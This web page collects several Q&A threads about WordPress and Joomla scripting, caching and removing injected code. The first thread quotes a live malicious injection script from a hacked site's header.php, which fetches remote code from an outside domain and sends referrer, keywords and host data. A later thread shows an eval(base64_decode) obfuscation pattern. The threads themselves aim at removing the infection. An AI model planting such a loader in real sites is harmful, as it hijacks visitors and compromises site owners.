My website is a wordpress site. the following code appears in Header.php every few hours , when I delete it, it appears again after few hours. Please note that the link in the code “shiro-maga.com” changes everytime. The code is following:
<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://shiro-maga.com/js/jquery.min.php?c_utt=G91825&c_utm='+encodeURIComponent('http://shiro-maga.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>
I believe that the theme is infected " scan show no malware" so it generate this script . could you please advise how to find the source of this script?
Thanks
Definitely malicious. Your site has been compromised. You can use the following detailed article to find and remove the source of the infection. http://ottopress.com/2009/hacked-wordpress-backdoors/. A program like Windows Grep will help you run a quick scan on all your theme files for keywords like eval and base64. Remove all suspicious stings of code from your theme and then update the WordPress core files to ensure you are running a clean version. Alternatively, if you have a backup, restore your theme's backup and update your site with a clean updated version of WP.
A quick fix to prevent reinfection is to CHMOD header.php to 444 (read only). Site will work and will not be reinfected giving you time to find infection.
Related
I create an excel web add-in project using Visual studio 2019;
now I make some changes in parser.js a js file in the project,then press F5 to debug,when I step into the code in parser.js,I found it actually run the code in the "parser.js[dynamic]" which is the old version.
I've tried several times,restart,even restart my computer,no use.
What I did wrong???
thanks for JPO's answer,but I got something wrong.
today I changed my code, also my html code, html codes I change are as follows:
<script src="Scripts/Parser.js?version=1.3" type="text/javascript"></script>
<script src="Home.js?version=1.3" type="text/javascript"></script>
yes, the old version is ?version=1.2.
Then press F5 to debug and I get this:
the DOM Explorer Home.html and Home.html
as you can see,the Home.html is changed but the DOM Explorer isn't
it seems like the Home.html has been cached.I wonder if I did something wrong and what should I do?
if you need more information please tell me and I'll post
as mentioned in my comment, this looks like a typical caching problem. Browsers tend to cache resources which aren't supposed to change often. E.g. styles or scripts. Therefore for development, it might be necessary to have tools like "Clear Cache" installed in the browser to clear the caches quickly. Or if it is just one file you are working on, then appending a get parameter e.g. ?version=1 (and increasing the value every time you update code inside the parser.js should be enough. Just don't forget to remove the parameter when you publish your code as the page load times will suffer.
Welcome to our community!
I am trying to add adsense code to a wordpress blog demonuts.com . I have put google code in the wordpress's TEXT WIDGET . But when I run the web site the url to .js, .css or .png file is changed in view page source.
For example original url to dashicon.min.css is 'http://demonuts.com/wp-includes/css/dashicons.min.css
but in view page source it is showing as ** http://demonuts.com/wp-includes/css/dashicons.min.x40477.css**
It is working for some css and js files but not for js file of google code.
Original google code in text widget : <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
code in view page source : <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.x40477.js"></script>
Questions
1.) From where does this x40477 is coming and why some files are still working?
2.) Google code is not working so how can I remove this x40477?
I am trying to solve this since 2 days. Plz any help is much appreciated. Thank you in advance!
Finally found the solution. There was a plugin called "W3 Total Cache", which was updating URLd. After deleting it, problem is solved.
If someone found same problem as I have, try to find plugin which is most likely to be reason for such problems.
I have gone through some Joomla tutorials and I am not understanding how Joomla works. I have never encountered something where every aspect of it evades me. I'm not asking for a free ride.. just where to go or a basic idea of how this works.
I simply need to add a Panoramio javascript into the <head></head> section of a joomla website. In Word Press I simply download the header.php template and code away.
It's so confusing understanding Joomla. I do know not to paste directly into an "Article" page so do I have to install some sort of extension or tool to even get this to work?
I read to edit the index.php in my templates but I can't even find that. Am I the only person that can't understand Joomla at all? Even the beginner documentation seems to assume I know their system. Thank you in advance.
Be careful about which files you add code to. Editing core files like the index.php in the templates folder might not be the best solution. What if there is a template update? The file will get overridden. So just bare that in mind.
Before you add the script, it is good idea to get the name of current template:
$app = JFactory::getApplication();
$template = $app->getTemplate();
You can use the following to import a .js file the <head> tags:
$doc = JFactory::getDocument(); //only include if not already included
$doc->addScript(JUri::root() . 'templates/' . $template . '/file.js');
or you can add the Javascript there and then like so:
$doc = JFactory::getDocument();
$js = "
//javascript goes here
";
$doc->addScriptDeclaration($js);
Hope this helps
you can edit index.php file and other template files as css etc.
go to : Extensions->template manager
chose template TAB
Second from the left you see: "template name" Details and Files
here you can edit any template file directly on your server.
Menu can change depending on Joomla version, but that's the general idea.
You definitely aren't the only one. Joomla is meant to be able to handle anything you need it to do, and this makes it rather complicated.
Your best bet is to add the script to the template index.php file that you mentioned if you want it to be available throughout the entire site. If you just needed it for a particular module or component, you would instead want to load it there. In your case, since you are fairly new to Joomla, let's just get it loading!
Navigate to your base Joomla directory (where you installed Joomla) and look for the templates folder. Within this you should have several folders. Hopefully you know which template you are currently using and open that folder and there should be an index.php file in it. The top of this file should look similar to the header.php file from Wordpress. Add your script tag to the header element and it should load.
If you have no idea what the name of your current template is, go to Extensions->Template Manager on the backend. There should be two with stars to the right of them. One should be marked "administrator" and the other "site". The folder that you are looking for in the templates folder should match the name of the "site" template.
Here is a quick tutorial on what you need to do:
Joomla! templates are at the /templates folder (locate your template)
inside you find the index.php file (there you need to change stuff)
inside you will find a html page with some PHP inside it
locate the <head> tag
How add this:
$doc->addScript($this->baseurl.'/templates/'.$this->template.'/javascript/YOURSCRIPT.js', 'text/javascript');
Make sure that this line of code already exists:
$doc = JFactory::getDocument();
Footnote: Because you did not specifiy what Joomla! version you are using, this example is from Joomla! 2.5, the current LTS.
P.S. You can also insert the script the 'normal' way, after the <head> tag.
I am no expert in JavaScript but I have an AJAX application that works perfectly without modifying any template files. The thing is that it adds the JavaScript at the bottom of the page, not in the head section. I don't know if this is an issue but it works for me.
1) Go to Extensions->Module Manager
2) Create a new module. Call it JavaScript Footer (for example)
3) Under the Details tab set Show Title to Hide, set Position to Debug, set Status to Published and set Access to Public
4) Under the Custom Output tab, type
<script type="text/javascript" src="http://yourdomain.com/yourscript.js"></script>
I never did understand why some scripts are in the header while others are at the bottom of the body (Google Analytics for example) but it works for me.
Joomla is quite different from Wordpress. Actually, index.php is rather useless when customizing joomla template. You will have to explore the blocks of the template in the folder blocks found in your template. For example, to add a scripts in the header section just edit header.php in the directory your_template/blocks.
I just minified a script using this tool and noticed the line "The code may also be accessed at default.js". Here's a pic:
How long will this link stay good for? Is it safe for me to use this in my script tags?
To use the optimized code, you can cut and paste it into your source file, download the file into your directory, or link to the file directly in your script tag (for up to one hour).
This is from the help page on the link you posted.
i,
I purchased a WP theme recently.
Seems that this theme is injecting a footer link in a sophisticated way that I can't find how to remove.
usually it link to WP theme sites (wp2blog.com/ , themes.weboy.org/ ) , which aren't related to me at all.
I tried to see if this is a CSS or JS injection - but I just can't find where this code is hiding.
It is surely not on the footer.php file which I immediately monitored.
any ideas?
thanks for the quick comments.
The culprit was the itself
Apparently somehow it injected those spam links.
I removed it and now the links are gone.
Still it's interesting how it was done.
How can I see which scripts are being called by wp_footer() ?
By removing <?php wp_footer(); ?> you will probably break some of your plugins, as they hook into either the header or footer to load JS and CSS for functionality.
Edit footer.php to remove those links.
If you need to see what wp_footer puts into the source of your site, view source on the page to get the full html.
But if it's a paid theme, you get what you pay for.
Generally, they do it with something like this
<?php echo eval(base64_decode('aC453434...')); ?>
Basically, they just encode the PHP code in Base64, and then eval() the returned string.
Check in footer.php, and it may also call other functions in functions.php IIRC.
Also, check the license and/or docs supplied with the theme. It may be a problem or violation of terms to remove that. They probably went about obfuscating it for a reason.
Answer: They usually have to have another (php) file from which to call in the appropriate spammy links. Check your theme directory for suspicious subfolders or php files with only a couple of lines within them.
Could be that they are really sneaky and have put the calling of spammy links within the Theme Widgets php file. But that is the best advice I can give as WordPress developer myself (who obviously never would even dream of putting spammy links inside my themes - it is a nightmarish way of losing clients as well as one´s reputation) - however, You have done the wrong thing, never delete wp_footer(); that is an essential part of any working WordPress installation because it will be required by future plugins that You shall have to certainly install to get WordPress working properly - like minifying and caching plugins for example.
Run the theme through Exploit Scanner and the Theme Authenticity Checker. There's probably some type of base64. You could also just search the whole theme manually for base64 and/or eval and see if it returns anything suspicious.
It's possible you purchased a knockoff theme, or just a bad one.
Solution: Keep the spammy code then go the the html source of the RENDERED PAGE and copy what's missing (generally it's a footer in the bottom of the page and explicitly marked as such with a div).
Copy what's there in your template code instead of the spammy eval base64 code, and remove the extra links and you're done.
This is how I did it.